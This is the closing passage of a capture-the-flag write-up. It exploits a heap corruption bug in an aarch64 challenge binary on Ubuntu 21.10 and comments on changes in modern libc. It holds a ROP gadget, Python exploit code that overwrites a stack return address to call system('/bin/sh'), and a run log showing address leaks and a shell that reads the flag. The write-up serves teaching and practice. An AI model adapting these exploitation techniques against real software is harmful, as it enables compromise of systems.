0x0000ffffa4b83a7c in __GI___libc_read (fd=0, buf=0xffffcbd5f948, nbytes=15) at ../sysdeps/unix/sysv/linux/read.c:26
26	../sysdeps/unix/sysv/linux/read.c: No such file or directory.
(gdb) c
Continuing.

Program received signal SIGBUS, Bus error.
0x0000004141414141 in ?? ()
(gdb) 

Yes! We created an interface that lets us read/write to the stack. No restrictions, no “no null bytes”, nothing. We can do whatever we like, and r/w to the stack using indices! Let’s drop a simple ROP, and it’s done. First of all, let me show you the simple gadget I chose in libc (nothing special about it, it’s just the first one that popped to me when I looked for adgets):

.text:0000000000132C8C LDP             X1, X0, [X19]
.text:0000000000132C90 LDP             X19, X20, [SP,#var_s10]
.text:0000000000132C94 LDP             X29, X30, [SP+var_s0],#0x20
.text:0000000000132C98 MOV             X16, X1
.text:0000000000132C9C BR              X16

And the new part in the exploit:

    faked_size = 0x22222222
    for i in range(2):
        fake = b"D" * (corrupt_prefix_length)
        fake += p32(faked_size) # size
        fake += p32(0x7fffffff) # max, avoid reallocation
        fake += p64(return_addr - faked_size * 8 + 0x100 * 8)
        add(p, TYPE_STRING, fake)

    gadget_offset = 0x132c8c
    # now list->data points to the stack. Test it out: let's corrupt the return address, and set the content pointed by X19
    edit(p, faked_size - 0x100 + 56, TYPE_LONG, system_addr)
    edit(p, faked_size - 0x100 + 56 + 1, TYPE_LONG, bin_sh_addr)
    edit(p, faked_size - 0x100, TYPE_LONG, libc_base + 0x132c8c)

Now, let’s run it:

root@dd90edacb085:/chg# python3 solve.py 
[+] Starting local process './distfiles/chg': pid 34
attach
[*] '/lib/aarch64-linux-gnu/libc.so.6'
    Arch:     aarch64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/chg/distfiles/chg'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] good, now fpool[0] points to list. list_data_ptr == 0xaaaab2c342f0
[*] edit list[1] to point to list[0], which has main_arena symbol in its content
/usr/local/lib/python3.9/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] delete list[0], move list[1] one position backward
[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc
[*] heap_addr @ 0xaaaab2c347c0
[*] main_arena @ 0xffff8e85eb48
[*] resolved addresses:
    libc @ 0xffff8e6c3000
    system @ 0xffff8e70d6b4
[*] env_ptr == 0xffffca54d7a8
[*] stack_addr == 0xffffca54dfcc
[*] stack_cookie == 0xaaaab2c342a0
[*] found good return address! *(0xffffca54d608) == 0xffff8e6edffc
[*] return_addr == 0xffffca54d5d8
[*] target_addr == 0xaaaab2c342a0
[*] bin_sh_addr == 0xaaaab2c343b0
[*] last_freed == 0xaaaab2c34950
[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write
[*] corrupt list_data_ptr->FD, make it point to an address on the heap before the list structure
[*] exploit done, system('/bin/sh') achieved, call interactive()
[*] Switching to interactive mode
$ lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 21.10
Release:    21.10
Codename:    impish
$ ls
challenge  distfiles  flag.txt    solve.py
$ cat flag.txt
ThisIsMyFlag
$ 
[*] Interrupted
[*] Stopped process './distfiles/chg' (pid 34)
root@dd90edacb085:/chg# 

Done :) Exploit works with all the mitigations in place, without any assumptions.

The curious reader might ask: “wait, why use the arbitrary write at all? Why not just do the arbitrary free on the list structure, to begin with?”. Well, the answer is very simple - you can’t :) To do the arbitrary free, we need the VA to be in the fpool array, which means we need to allocate and free a string before the list structure is allocated. And we can’t do that :)

Summary

I hope I summarized some of the major changes in modern libc versions that are used by default on latest Ubuntu.

As you can see, during this write-up, I ran the challenge over aarch64 in Ubuntu 20.04 and Ubuntu 21.10 docker containers. I tested solve_20.04.py on Ubuntu x64 machine as well, and it works the same (up to changing the path to libc and the main_arena, of course). The 21.10 solution needs offsets changes for x64, obviously.

The exploits are in this repo: solve_20.04.py and solve_21.10.py. All the challenge materials are in the challenge directory, here (copied from the repo linkd at the beginning of this blogpost).

Thanks,

Saar Amar